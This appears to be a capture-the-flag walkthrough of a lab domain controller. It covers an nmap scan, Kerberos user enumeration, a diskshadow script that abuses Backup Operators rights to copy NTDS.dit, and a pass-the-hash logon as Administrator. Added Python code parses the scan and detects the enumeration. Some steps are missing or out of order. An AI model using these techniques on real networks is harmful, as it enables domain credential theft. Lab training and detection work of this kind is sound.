Nmap scan report for fusion.corp (10.10.234.3)
Host is up (0.063s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-title: eBusiness Bootstrap Template
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-04 11:20:35Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=Fusion-DC.fusion.corp
| Issuer: commonName=Fusion-DC.fusion.corp
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-03T10:53:31
| Not valid after: 2024-12-03T10:53:31
| MD5: d2aa:3262:517d:2b4e:912f:42ec:612f:4403
|_SHA-1: 40d0:f1db:52b3:186b:2cca:16c8:bba6:9690:2e03:74a9
| rdp-ntlm-info:
| Target_Name: FUSION
| NetBIOS_Domain_Name: FUSION
| NetBIOS_Computer_Name: FUSION-DC
| DNS_Domain_Name: fusion.corp
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-04T11:21:29+00:00
|_ssl-date: 2024-06-04T11:22:08+00:00; -2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49687/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: FUSION-DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-06-04T11:21:32
|_ start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 59.51 ms 10.8.0.1
2 63.12 ms fusion.corp (10.10.234.3)
NSE: Script Post-scanning.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 217.12 seconds
Raw packets sent: 131214 (5.777MB) | Rcvd: 2685 (646.142KB)
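The scan above is nmap's normal-output format. The Python below is an added example, not code from the original write-up, that parses that format into port entries and host-script lines and then applies a few triage rules a defender of this domain controller would care about (TRACE enabled on IIS, RDP and WinRM reachable on a DC, LDAP reachable, SMB signing state, the OS build leaked by rdp-ntlm-info). It embeds a subset of the scan output as constructed sample input so it runs offline; the triage rules and their wording are my own assumptions, not anything nmap reports.

```python
import re
from dataclasses import dataclass, field

# Subset of the scan above, embedded as constructed sample input so the parser
# runs offline. A real run would read the file written by nmap -oN instead.
SAMPLE_SCAN = """\
Nmap scan report for fusion.corp (10.10.234.3)
Host is up (0.063s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-04 11:20:35Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fusion.corp0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| DNS_Computer_Name: Fusion-DC.fusion.corp
| Product_Version: 10.0.17763
|_ System_Time: 2024-06-04T11:21:29+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 445/tcp)
"""

# A port-table row such as "80/tcp open http Microsoft IIS httpd 10.0"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str
    version: str
    script_lines: list = field(default_factory=list)  # NSE output under this port


def parse_nmap(text):
    """Parse nmap normal output into port entries plus host-script lines."""
    ports, host_scripts = [], []
    current = None            # port entry currently receiving "|" NSE lines
    in_host_scripts = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if not line:
            continue
        m = PORT_RE.match(line)
        if m:
            current = PortEntry(int(m.group(1)), m.group(2), m.group(3),
                                m.group(4), m.group(5).strip())
            ports.append(current)
            in_host_scripts = False
            continue
        if line.startswith("Host script results:"):
            in_host_scripts, current = True, None
            continue
        if line.startswith("|"):
            body = line.lstrip("|_ ").strip()   # drop the "| " / "|_" NSE prefix
            if in_host_scripts:
                host_scripts.append(body)
            elif current is not None:
                current.script_lines.append(body)
            continue
        # Any other line (Warning:, TRACEROUTE, ...) ends the current NSE block.
        current, in_host_scripts = None, False
    return ports, host_scripts


def smb_signing_required(host_scripts):
    """True when smb2-security-mode reports that signing is required."""
    return any("Message signing enabled and required" in s for s in host_scripts)


def triage(ports, host_scripts):
    """Turn parsed output into (port, note) findings; rules are assumptions."""
    findings = []
    for e in ports:
        if e.state != "open":
            continue
        nse = "\n".join(e.script_lines)
        m = re.search(r"Potentially risky methods: (.+)", nse)
        if m:
            findings.append((e.port, f"HTTP risky methods enabled: {m.group(1)}"))
        m = re.search(r"Product_Version: (\S+)", nse)
        if m:
            findings.append((e.port, f"rdp-ntlm-info leaks OS build {m.group(1)}"))
        if e.port == 3389:
            findings.append((e.port, "RDP reachable on a domain controller; restrict to admin hosts"))
        if e.port == 5985:
            findings.append((e.port, "WinRM reachable; restrict to management networks"))
        if e.port in (389, 3268):
            findings.append((e.port, "LDAP reachable; enforce LDAP signing and channel binding"))
    if not smb_signing_required(host_scripts):
        findings.append((445, "SMB signing not required; relay risk"))
    return findings


if __name__ == "__main__":
    ports, host_scripts = parse_nmap(SAMPLE_SCAN)
    for p in ports:
        print(f"{p.port}/{p.proto} {p.service} {p.version}")
    for port, note in triage(ports, host_scripts):
        print(f"[{port}] {note}")
```

Running it against the full scan (read from an `-oN` file) gives the same kind of list; the SMB signing rule is silent here because the host script above already reports signing as required.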
Port 80
Running ffuf against the website hosted on port 80, we obtain some juicy results:
From this XML we can extract a useful list of usernames:
Jhon Mickel,jmickel
Andrew Arnold,aarnold
Lellien Linda,llinda
Jhon Powel,jpowel
Dominique Vroslav,dvroslav
Thomas Jeffersonn,tjefferson
Nola Maurin,nmaurin
Mira Ladovic,mladovic
Larry Parker,lparker
Kay Garland,kgarland
Diana Pertersen,dpertersen
Port 445 (anonymous enumeration)
Trying some enumeration on port 445, we notice that it is not possible to list shares as the anonymous or guest user:
Port 88
If we validate the previously extracted list of users against Kerberos with kerbrute, we find that only one of the 11 usernames exists in the domain: lparker.
Membership in the Backup Operators group provides access to the domain controller's file system through the SeBackupPrivilege and SeRestorePrivilege rights. These privileges allow traversing folders, listing directories and copying files even without explicit permissions, by opening the files with the FILE_FLAG_BACKUP_SEMANTICS flag. This means a Backup Operator can back up the DC's hard drive, take a copy of NTDS.dit and the SYSTEM registry hive from the backup, move both files offline and dump the hashes.
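Both of the last two steps leave traces on the domain controller. Kerberos user validation with kerbrute produces a burst of 4768 (TGT request) events with result code 0x6 (KDC_ERR_C_PRINCIPAL_UNKNOWN), one per name that does not exist, and a Backup Operator's logon produces a 4672 (special privileges assigned) event listing SeBackupPrivilege and SeRestorePrivilege. The Python below is an added detection example, not part of the original write-up, that runs both checks over a constructed sample of Security-log records: the field names follow the Windows events, the usernames reuse the list extracted above, and the IP addresses, timestamps, thresholds and the allow-list of accounts expected to hold backup rights are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Result code in event 4768 for a username the KDC does not know
# (KDC_ERR_C_PRINCIPAL_UNKNOWN); every invalid name tried by kerbrute yields one.
UNKNOWN_PRINCIPAL = "0x6"
# Rights granted to Backup Operators that allow reading files regardless of ACLs.
BACKUP_RIGHTS = {"SeBackupPrivilege", "SeRestorePrivilege"}
# Hypothetical allow-list: accounts that are expected to log on with backup rights.
ALLOWED_BACKUP_ACCOUNTS = {"Administrator", "FUSION-DC$"}


def _t(sec):
    return datetime(2024, 6, 4, 11, 20, sec)


def tgt(sec, ip, user, status):
    """Constructed 4768 record reduced to the fields the detection uses."""
    return {"EventID": 4768, "Time": _t(sec), "IpAddress": ip,
            "TargetUserName": user, "Status": status}


def priv(sec, user, rights):
    """Constructed 4672 record reduced to the fields the detection uses."""
    return {"EventID": 4672, "Time": _t(sec), "SubjectUserName": user,
            "PrivilegeList": rights}


SCANNER, WORKSTATION = "::ffff:10.8.0.5", "::ffff:10.10.234.50"   # assumed addresses
SAMPLE_EVENTS = (
    # six unknown names in six seconds from one address: user enumeration
    [tgt(30 + i, SCANNER, name, UNKNOWN_PRINCIPAL) for i, name in
     enumerate(["jmickel", "aarnold", "llinda", "jpowel", "dvroslav", "tjefferson"])]
    + [
        tgt(40, WORKSTATION, "lparkr", UNKNOWN_PRINCIPAL),   # a single typo, not an alert
        tgt(41, WORKSTATION, "lparker", "0x0"),              # normal successful TGT request
        priv(50, "Administrator", ["SeBackupPrivilege", "SeRestorePrivilege", "SeDebugPrivilege"]),
        priv(55, "jmurphy", ["SeBackupPrivilege", "SeRestorePrivilege", "SeShutdownPrivilege"]),
    ]
)


def detect_user_enumeration(events, threshold=5, window=timedelta(minutes=1)):
    """Map client address -> sorted unknown usernames for every address that
    produced `threshold` or more distinct unknown names within `window`."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4768 and ev.get("Status") == UNKNOWN_PRINCIPAL:
            by_ip[ev["IpAddress"]].append((ev["Time"], ev["TargetUserName"]))
    alerts = {}
    for ip, hits in by_ip.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):      # sliding window from each hit
            names = {name for t, name in hits[i:] if t <= start + window}
            if len(names) >= threshold:
                alerts[ip] = sorted(names)
                break
    return alerts


def detect_backup_privilege_logons(events, allowed_accounts):
    """List (account, backup rights) for 4672 logons outside the allow-list."""
    allowed = {a.lower() for a in allowed_accounts}
    flagged = []
    for ev in events:
        if ev["EventID"] != 4672:
            continue
        granted = set(ev["PrivilegeList"]) & BACKUP_RIGHTS
        if granted and ev["SubjectUserName"].lower() not in allowed:
            flagged.append((ev["SubjectUserName"], sorted(granted)))
    return flagged


if __name__ == "__main__":
    for ip, names in detect_user_enumeration(SAMPLE_EVENTS).items():
        print(f"possible Kerberos user enumeration from {ip}: {', '.join(names)}")
    for account, rights in detect_backup_privilege_logons(SAMPLE_EVENTS, ALLOWED_BACKUP_ACCOUNTS):
        print(f"unexpected backup rights at logon: {account} -> {', '.join(rights)}")
```

The 4768 check keys on distinct names rather than raw event counts so that one user mistyping their own name repeatedly does not trip it, while the kerbrute pattern (many different names, one source, a few seconds) does. Reviewing Backup Operators membership regularly is the cheaper control; the 4672 check catches the moment such an account is actually used.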
On the Kali machine, create a backup.txt file containing these commands:
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backup
From the remote session as jmurphy, create a temporary directory C:\Temp, upload backup.txt to it and run diskshadow.exe in script mode:
Now copy the required files from the exposed shadow copy to the current directory (C:\Temp):
Awesome! We've obtained another credential pair for the user jmurphy:
Using a Pass-the-Hash attack, we can authenticate as Administrator via evil-winrm with the hash in NT hash format and get the third flag, completing the room!